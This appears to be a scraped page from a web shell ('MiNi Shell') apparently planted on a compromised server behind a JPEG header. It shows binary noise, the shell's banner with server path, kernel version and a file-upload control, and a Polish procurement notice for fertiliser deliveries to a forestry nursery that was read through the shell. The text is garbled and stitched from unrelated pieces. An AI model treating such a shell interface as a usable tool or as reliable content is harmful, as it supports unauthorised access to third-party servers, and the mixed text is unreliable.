JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230228/0011435401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa nawozów do Gospodarstwa Szkółkarskiego w Nędzy w 2023 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Rudy Raciborskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272536296</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rogera 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rudy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-430</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rudy@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rudy-raciborskie.katowice.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa nawozów do Gospodarstwa Szkółkarskiego w Nędzy w 2023 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ab465af0-b74e-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00114354</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.gov.pl/web/nadlesnictwo-rudy-raciborskie/zamowienia-publiczne2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Środkiem komunikacji elektronicznej jest platforma JOSEPHINE dostępna pod adresem internetowym https://josephine.proebiz.com/pl/ oraz poczta elektroniczna rudy@katowice.lasy.gov.pl z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu platformy JOSEPHINE.<br/>Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na platformie JOSEPHINE. <br/>Po założeniu konta Wykonawca uzyskuje dostęp do modułu komunikacyjnego, złożenia/wycofania oferty. <br/>Wymagania techniczne portalu JOSEPHINE znajdują się w stopce ekranu głównego po kliknięciu słowa „Wsparcie”.<br/>Skrócona instrukcja dla Wykonawców dostępna jest po kliknięciu na stronie ekranu głównego portalu JOSEPHINE w ikonkę książki znajdującą się na górnym pasku (biblioteka instrukcji i linków), obok ikonki „flaga” służącej do wyboru języka. <br/>Wsparcie techniczne dla Wykonawców przy pomocy numeru telefonu +48 222 139 900 lub mailowo houston@proebiz.com.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający dopuszcza formaty danych określone w rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tekst jednolity: Dz. U. z 2017 r. poz. 2247) w szczególności formaty: .pdf, .doc, .docx, .rtf, .odt.<br/>W celu minimalizacji problemów związanych ze składaniem dokumentów <br/>w formie elektronicznej Zamawiający zaleca elektroniczne sporządzenie oferty i zapisanie jej w formacie PDF oraz podpisanie kwalifikowanym podpisem elektronicznym w formacie PAdES lub zapisanie oferty w formacie PDF i złożenie jej w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dot RODO zawiera pkt 26 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dot RODO zawiera pkt 26 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZG.270.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Dostawa nawozów do Gospodarstwa Szkółkarskiego w Nędzy w 2023 roku”. <br/><br/>Szczegółowy opis przedmiotu zamówienia:<br/>a)	Zamówienie zostało podzielone na trzy zadania częściowe:<br/><br/>Nr zadania częściowego	ZAKRES ZADANIA<br/>1	Dostawa nawozu osmocote 3-4 miesiące (lub równoważnego)<br/>2	Dostawa nawozu floralesad (lub równoważnego)<br/>3	Dostawa nawozu azofoska pylista (lub równoważnego)<br/><br/>ZADANIE CZĘŚCIOWE NR 1<br/><br/>a) Ilość zamawianego nawozu osmocote (lub równoważnego): 3 450 kg <br/>b) Skład NPK: 16+9+12+ 2MgO+mikroelementy;<br/>c) Nawóz otoczkowany o przedłużonym działaniu i kontrolowanym, równomiernym w czasie uwalnianiu składników pokarmowych<br/>d) Okres uwalniania składników: 3-4 miesiące w temperaturze 21°C<br/>e) Sposób pakowania nawozu: dedykowane opakowania (worki) o wadze jednostkowej od 15 kg do 30 kg<br/>f) Zamawiający nie dopuszcza zaoferowania i dostawy nawozu o krótszym/dłuższym niż wskazany powyżej okresie uwalniania składników pokarmowych<br/>g) Termin realizacji dostawy do 1 miesiąca od dnia zawarcia umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24440000-0 - Różne nawozy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W niniejszym postępowaniu Zamawiający przewiduje możliwość wykorzystania prawa Opcji o którym mowa w art. 441 ust. 1 PZP. Zakres ilościowy dostaw wskazany powyżej dla każdego z zadań częściowych stanowi zakres podstawowy zamówienia. <br/>W ramach prawa Opcji Zamawiający przewiduje możliwość zlecenia wykonania dodatkowych dostaw nawozów w ilości do 20% ilości podstawowej dla każdego z zadań częściowych. Wykonawcy nie przysługuje roszczenie o zlecenie wykonania dostaw objętych prawem Opcji. Rozliczenie za dostawy objęte prawem Opcji nastąpi na podstawie wartości 1 kg/litra nawozu ustalonej na drodze niniejszego postępowania <br/>i ilości zamówionych kg/litrów. Zamawiający zleci dostawy w ramach Opcji w przypadku zwiększonego zapotrzebowania na nawozy w Gospodarstwie Szkółkarskim w Nędzy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty w każdym z zadań częściowych Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/><br/>	Cena – 100 %,<br/><br/>Sposób obliczania punktów dla kryterium cena:<br/>1)	W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/>C=Cn/Co x 100 pkt<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu oferty (załącznik nr 1 do SWZ).<br/><br/>Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami. <br/><br/>Za najkorzystniejszą w każdym z zadań częściowych zostanie uznana oferta, która otrzyma najwyższą liczbę punktów w wskazanym powyżej kryterium.<br/><br/>Oferta może uzyskać maksymalnie 100 punktów. <br/>Zamawiający obliczy punkty liczbowo z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi. <br/><br/>Zamawiający stosuje kryterium oceny ofert Cena – 100% ponieważ zgodnie z art. 246 ust. 2 PZP opis przedmiotu zamówienia zawarty w SWZ szczegółowo określa wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Dostawa nawozów do Gospodarstwa Szkółkarskiego w Nędzy w 2023 roku”. <br/><br/>ZADANIE CZĘŚCIOWE NR 2<br/><br/>a)	Ilość zamawianego nawozu floralesad (lub równoważnego): 3 500 litrów <br/>b)	koncentrat nawozu płynnego do dolistnego nawożenia sadzonek drzew leśnych<br/>c) skład: około 107,4 g azotu ogólnego, (ponad 87% azotu w formie amidowej) około 40,5 g P2O5, 57,9 g K2O w postaci bezchlorowej, ponad 5,8 g MgO i ponad 1,8 g żelaza w postaci chelatowanej w litrze nierozcieńczonego koncentratu (+mangan, cynk, miedź, bor, siarka i molibden)<br/>d)	śladowa obecność sodu i chlorków<br/>e)	w stanie nierozcieńczonym pH koncentratu około 4,0<br/>f) Termin realizacji dostawy do 1 miesiąca od dnia zawarcia umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24440000-0 - Różne nawozy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W niniejszym postępowaniu Zamawiający przewiduje możliwość wykorzystania prawa Opcji o którym mowa w art. 441 ust. 1 PZP. Zakres ilościowy dostaw wskazany powyżej dla każdego z zadań częściowych stanowi zakres podstawowy zamówienia. W ramach prawa Opcji Zamawiający przewiduje możliwość zlecenia wykonania dodatkowych dostaw nawozów w ilości do 20% ilości podstawowej dla każdego z zadań częściowych. Wykonawcy nie przysługuje roszczenie o zlecenie wykonania dostaw objętych prawem Opcji. Rozliczenie za dostawy objęte prawem Opcji nastąpi na podstawie wartości 1 kg/litra nawozu ustalonej na drodze niniejszego postępowania <br/>i ilości zamówionych kg/litrów. Zamawiający zleci dostawy w ramach Opcji w przypadku zwiększonego zapotrzebowania na nawozy w Gospodarstwie Szkółkarskim w Nędzy <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty w każdym z zadań częściowych Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/><br/>Cena – 100 %,<br/><br/>Sposób obliczania punktów dla kryterium cena:<br/>1)	W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/>C=Cn/Co x 100 pkt<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu oferty (załącznik nr 1 do SWZ).<br/><br/>Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami. <br/>Za najkorzystniejszą w każdym z zadań częściowych zostanie uznana oferta, która otrzyma najwyższą liczbę punktów w wskazanym powyżej kryterium.<br/>Oferta może uzyskać maksymalnie 100 punktów. <br/>Zamawiający obliczy punkty liczbowo z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi. <br/>Zamawiający stosuje kryterium oceny ofert Cena – 100% ponieważ zgodnie z art. 246 ust. 2 PZP opis przedmiotu zamówienia zawarty w SWZ szczegółowo określa wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Dostawa nawozów do Gospodarstwa Szkółkarskiego w Nędzy w 2023 roku”<br/><br/>ZADANIE CZĘŚCIOWE NR 3<br/><br/>a) Ilość zamawianego nawozu azofoska pylista (lub równoważnego): 5 400 kg <br/>b) Skład NPK, Ca, Mg +mikroelementy (żelazo, mangan, miedź, cynk, bor <br/>i molibden);<br/>c) Nawóz w formie pylistej<br/>d) Niska zawartość chlorków<br/>e) Sposób pakowania nawozu: dedykowane opakowania (worki) o wadze jednostkowej od 15 kg do 30 kg<br/>f)	Zamawiający nie dopuszcza zaoferowania i dostawy nawozu granulowanego.<br/>g)	Termin realizacji dostawy do 3 miesięcy od dnia zawarcia umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24440000-0 - Różne nawozy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 5.5.	W niniejszym postępowaniu Zamawiający przewiduje możliwość wykorzystania prawa Opcji o którym mowa w art. 441 ust. 1 PZP. Zakres ilościowy dostaw wskazany <br/>powyżej dla każdego z zadań częściowych stanowi zakres podstawowy zamówienia. <br/>W ramach prawa Opcji Zamawiający przewiduje możliwość zlecenia wykonania dodatkowych dostaw nawozów w ilości do 20% ilości podstawowej dla każdego z zadań częściowych. Wykonawcy nie przysługuje roszczenie o zlecenie wykonania dostaw objętych prawem Opcji. Rozliczenie za dostawy objęte prawem Opcji nastąpi na podstawie wartości 1 kg/litra nawozu ustalonej na drodze niniejszego postępowania <br/>i ilości zamówionych kg/litrów. Zamawiający zleci dostawy w ramach Opcji w przypadku zwiększonego zapotrzebowania na nawozy w Gospodarstwie Szkółkarskim w Nędzy <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty w każdym z zadań częściowych Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/><br/>Cena – 100 %,<br/><br/>Sposób obliczania punktów dla kryterium cena:<br/>1)	W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/>C=Cn/Co x 100 pkt<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu oferty (załącznik nr 1 do SWZ).<br/><br/>Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami. <br/>Za najkorzystniejszą w każdym z zadań częściowych zostanie uznana oferta, która otrzyma najwyższą liczbę punktów w wskazanym powyżej kryterium.<br/>Oferta może uzyskać maksymalnie 100 punktów. <br/>Zamawiający obliczy punkty liczbowo z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi. <br/>Zamawiający stosuje kryterium oceny ofert Cena – 100% ponieważ zgodnie z art. 246 ust. 2 PZP opis przedmiotu zamówienia zawarty w SWZ szczegółowo określa wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wstępnego potwierdzenia braku podstaw do wykluczenia z postępowania, oraz potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca składa wraz z ofertą oświadczenie, o którym mowa w art. 125 PZP, tj. wstępne oświadczenie zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ oraz oświadczenie Wykonawcy o braku 